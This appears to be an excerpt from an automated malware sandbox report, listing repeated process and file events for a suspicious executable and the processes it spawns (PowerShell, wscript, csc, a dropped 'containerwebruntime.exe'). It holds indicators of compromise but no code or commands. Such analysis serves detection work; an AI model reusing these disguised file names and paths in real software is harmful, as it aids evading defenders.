                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Users\user\Desktop\wxl1r0lntg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\wxl1r0lntg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\wxl1r0lntg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\wxl1r0lntg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\wxl1r0lntg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\wxl1r0lntg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\wxl1r0lntg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\wxl1r0lntg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\wxl1r0lntg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\wxl1r0lntg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\wxl1r0lntg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\wxl1r0lntg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\wxl1r0lntg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\wxl1r0lntg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\wxl1r0lntg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\wxl1r0lntg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\wxl1r0lntg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\wxl1r0lntg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\sqls211.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\drivEn760.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files\Everything\Everything.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
